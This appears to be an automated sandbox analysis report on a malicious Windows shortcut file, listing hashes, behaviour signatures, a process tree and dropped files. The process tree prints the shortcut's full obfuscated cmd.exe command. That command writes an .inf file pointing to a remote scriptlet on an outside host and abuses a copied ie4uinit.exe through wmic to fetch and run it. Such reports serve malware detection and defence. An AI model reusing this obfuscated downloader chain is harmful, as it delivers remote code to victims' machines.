Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/08/2024, 05:27

General

  • Target

    Mark Qualman.lnk

  • Size

    5KB

  • MD5

    4a792636a97df1ddec0d4e54272ca177

  • SHA1

    038ef3af740407c9514b28e7aa8524bcf84b9bed

  • SHA256

    f115187143a80b062a4844dbd462ed183e374263eeea874780eb65775991da22

  • SHA512

    3beb9b7608a93757913cd7f31614f5cbdd9a0a6c7bb9ad9fa70cb7d498b8479f89bf46217f7ad70eb731ef933f627cc3e33599d275396ca69eda3b9e714909b7

  • SSDEEP

    96:8u5XtaRd9qmN5yYLhTrrfhbFKyVmZXj5kpYZuBPSk:8Mad9qm7yurdbFxaj5kpXF

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Mark Qualman.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c (for %u in (s) do @set "Assets=%~u") && (for %q in (a) do @!Assets!et "Totals=%~q") && !Assets!et "Improvements=default" && (for %d in (c) do @!Assets!et "Someone=%~d") && !Assets!et "Occasions=d" && !Assets!et "Facts=si" && !Assets!et "Scholars=version" && !Assets!et "Appliances=settings" && !Assets!et "Proceeds=t" && !Assets!et "Truly=ure = " && !Assets!et "Belongs=ni" && !Assets!et "Arrow=e" && !Assets!et "Tattoo=$win" && !Assets!et "Moderators=." && !Assets!et "Plastics=a" && !Assets!et "Traditions=!Moderators!inf" && !Assets!et "Barrel=ieui!Belongs!t!Traditions!" && c!Plastics!ll !Assets!et "Cleaners=%!Totals!ppd!Plastics!ta%\micro!Assets!oft\" && s!Arrow!t "Officers=!Cleaners!!Barrel!" && (for %u in ("[!Scholars!]" "signat!Truly!!Tattoo!dows nt$" "[7E55D7]" "ieu%Quantities%!Traditions!" "[!Occasions!e!Assets!tinationdirs]" "!Improvements!destdir=11" "7E55D7=01" "[BCB]" "sc\" "ro%Weights%j,NI,%Umbrella%%Situate%%Situate%p%Racks%%Otherwise%%Otherwise%oshof!Moderators!markqualman!Moderators!%Produce%/jlghiht" "[s!Proceeds!ring!Assets!]" "Otherwise=/" "!Assets!ervicen!Totals!me=' '" "!Assets!hortsvcn!Totals!me=' '" "Umbrella=h" "Order=%time%" "Situate=t;Pencil" "Racks=:;Bones" "Quantities=i!Belongs!t" "Produce=com" "Weights=b;Unaware" "[!Improvements!in!Assets!tall.windows7]" "!Occasions!elfil!Arrow!s=7E55D7" "Un\" "Register\" "OCXs=BCB" ) do @e!Someone!ho %~u)>"!Officers!" && !Assets!et "Refers=ie4ui!Belongs!t.!Arrow!xe" && !Someone!all x!Someone!opy /Y /C /Q %win!Occasions!ir%\!Assets!ys!Proceeds!!Arrow!m32\!Refers! "!Cleaners!*" | !Assets!et Receivers04=Naive && !Assets!t!Totals!rt "" wmi!Someone! proce!Assets!s call !Someone!rea!Proceeds!e "!Cleaners!!Refers! -base!Appliances!" 
| !Assets!et "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:540
        • C:\Windows\system32\xcopy.exe
          xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\Admin\AppData\Roaming\microsoft\*"
          4⤵
            PID:4528
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set Receivers04=Naive "
          3⤵
            PID:2616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:32
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process call create "C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3048
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set "Receivers58=Stands Claim River Solid Twist Condos Meadow Cheers Weasel Luggage Gross Tanks Acquisitions Taste Gesture Version Referrals Fears Cameras Obtain Bullet Managers Medal Spots Commissions Dimensions Strips Checks Swarm Praise Increase Jeans Power Plants Colours Signs Possibilities Consensus Marine Investors Poverty Science""
            3⤵
              PID:1264
        • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
          C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
          1⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:4764
          • C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe
            C:\Users\Admin\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4092
            • C:\Windows\system32\RunDll32.exe
              C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
              3⤵
                PID:324
              • C:\Windows\system32\RunDll32.exe
                C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
                3⤵
                  PID:1504

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\ie4uinit.exe

    Filesize

    262KB

    MD5

    a2f0104edd80ca2c24c24356d5eacc4f

    SHA1

    8269b9fd9231f04ed47419bd565c69dc677fab56

    SHA256

    5d85c4d62cc26996826b9d96a9153f7e05a2260342bd913b3730610a1809203c

    SHA512

    e7bb87f9f6c82cb945b95f62695be98b3fa827a24fa8c4187fe836d4e7d3e7ae3b95101edd3c41d65f6cb684910f5954a67307d450072acd8d475212db094390

  • C:\Users\Admin\AppData\Roaming\microsoft\ieuinit.inf

    Filesize

    482B

    MD5

    9408963b463ae977ab3121575fdef9ba

    SHA1

    c95953b9972aa295dae5b7ec586dfd3b98ed664b

    SHA256

    ff62fb0c98a017b38a5ad52908aa3b7333f90abb1d66b012b33a6550ce19e988

    SHA512

    92c86e6305cc4dafb95773ee7dcb4b70aa96a91f7c9f560635047ed32fcb35fa652ac06208bc47e8a01c18c71254b9c461b07ddf7992ca9fc7bd1e4f8be786b3